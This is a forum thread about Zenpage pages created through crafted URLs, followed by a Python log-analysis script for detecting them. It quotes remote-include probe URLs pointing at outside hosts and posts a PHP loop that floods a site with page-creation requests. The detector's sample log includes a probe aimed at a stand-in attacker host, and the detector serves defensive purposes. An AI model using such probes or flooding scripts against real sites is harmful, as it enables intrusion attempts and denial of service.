Possible SQL injection??

code Member
I have two articles in zenpage that I did not create. Both are Untitled.

When I edit them it shows under "Title Link" the following:
`//?p=http://soccerbetting.me.uk/images/safe1.txt???`

And the other shows this:
`//?p=http://www.vihorlat.lietame.sk/photos/galeria/safe1.txt???`

Edit: Running this version: 1.2.3 [3673]

Comments

  • acrylian Administrator, Developer
    This is a bug and is not a real security issue because it always creates empty pages. Besides the fact that 1.2.3 is not the current version you need to update to the latest nightly.
  • To say it's not a security issue isn't exactly accurate. Whether it's a bug or not seems irrelevant. It is indeed a security issue when data can be inserted into the database freely. Even though the pages are empty, an attacker can literally swamp the database with these empty pages in what would amount to a denial of service attack.

    If it hasn't already been, the official release should be patched and a public warning should be issued about this vulnerability. You should not expect everyone to automatically download the nightly build, especially considering the nightly build is usually unstable. Although the nightly build will fix the bug, the version on the front page of your website is the one everyone is going to install first.
  • 1. The attacker can create exactly two records, one for `pages` and one for `news`. Hardly "Swamping" the database.

    2. If it really is a concern to you, why have you not installed at least the 1.2.4 release or better the nightly builds?

    3. What is more 'public' than this forum?
  • All an attacker has to do is make 1 simple change to the URL address to insert a new page, which is a simple task to automate. Something like ...
    ```php
    <?php
    // Target gallery root; hypothetical placeholder, not a real site.
    $base = 'http://example.com/';
    // Bound kept from the original post; it exceeds PHP_INT_MAX, so PHP treats it
    // as a float and the loop effectively runs until interrupted.
    for ($i = 0; $i < 10000000000000000000000; $i++) {
        $attack = @file($base . 'index.php?p=pages&title=' . $i);
    }
    ```
    There you have 10000000000000000000000 new records in the database.
  • Not if you are running the current release. If you won't run the current release, you are on your own.
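Whichever side of the "is this a security issue" argument you take, it helps to be able to see the behaviour in web server logs. The following is an added example, not code from the thread or from Zenphoto: a small Python script that parses combined-format access log lines and flags two things, `p=` values that carry a URL (the shape of the two title links in the original post) and clients that request many distinct `title` values for `p=pages` or `p=news` within a short window (the shape of the loop posted above). The log lines, the IP addresses, the `attacker.example` host, the 60-second window and the threshold of three distinct titles are all constructed assumptions for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (combined log format); not real traffic.
# 203.0.113.5 mimics the automated loop, 198.51.100.7 mimics a URL in `p=`,
# 192.0.2.9 is an ordinary visitor opening two pages minutes apart.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2009:12:00:01 +0000] "GET /index.php?p=pages&title=1 HTTP/1.1" 200 512 "-" "curl/7.19"
203.0.113.5 - - [10/Mar/2009:12:00:01 +0000] "GET /index.php?p=pages&title=2 HTTP/1.1" 200 512 "-" "curl/7.19"
203.0.113.5 - - [10/Mar/2009:12:00:02 +0000] "GET /index.php?p=pages&title=3 HTTP/1.1" 200 512 "-" "curl/7.19"
203.0.113.5 - - [10/Mar/2009:12:00:02 +0000] "GET /index.php?p=news&title=4 HTTP/1.1" 200 512 "-" "curl/7.19"
198.51.100.7 - - [10/Mar/2009:12:00:03 +0000] "GET /index.php?p=http://attacker.example/safe1.txt??? HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
192.0.2.9 - - [10/Mar/2009:12:00:04 +0000] "GET /index.php?p=pages&title=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2009:12:05:00 +0000] "GET /index.php?p=pages&title=contact HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format matcher: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Zenpage content types whose `title` parameter the thread is about.
CONTENT_TYPES = {"pages", "news"}
URL_VALUE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://")


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    split = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": ts,
        "path": split.path,
        # keep_blank_values so an empty title still counts as a request
        "qs": parse_qs(split.query, keep_blank_values=True),
    }


def remote_include_probes(events):
    """Requests whose `p` value is itself a URL, like the title links in the post."""
    hits = []
    for ev in events:
        for value in ev["qs"].get("p", []):
            if URL_VALUE.match(value):
                hits.append((ev["ip"], value))
    return hits


def creation_bursts(events, window=timedelta(seconds=60), threshold=3):
    """Clients requesting >= threshold distinct titles for pages/news within window.

    Returns {ip: largest number of distinct titles seen in any single window}.
    """
    per_ip = defaultdict(list)
    for ev in events:
        p = ev["qs"].get("p", [""])[0]
        titles = ev["qs"].get("title")
        if p in CONTENT_TYPES and titles:
            per_ip[ev["ip"]].append((ev["ts"], titles[0]))
    flagged = {}
    for ip, hits in per_ip.items():
        hits.sort()
        best = 0
        for i, (t0, _) in enumerate(hits):
            # distinct titles requested from t0 up to t0 + window
            in_window = {title for t, title in hits[i:] if t - t0 <= window}
            best = max(best, len(in_window))
        if best >= threshold:
            flagged[ip] = best
    return flagged


def analyse(log_text):
    """Run both detections over a block of log text."""
    events = [ev for ev in (parse_line(l) for l in log_text.splitlines()) if ev]
    return {
        "probes": remote_include_probes(events),
        "bursts": creation_bursts(events),
    }


if __name__ == "__main__":
    for kind, found in analyse(SAMPLE_LOG).items():
        print(kind, found)
```

The burst detector counts distinct `title` values rather than raw request volume, because a real visitor reloading the same page many times should not trip it, while the posted loop changes the title on every request. The window and threshold are tuning knobs; on a busy gallery you would raise them and feed the script the real log instead of the constructed sample.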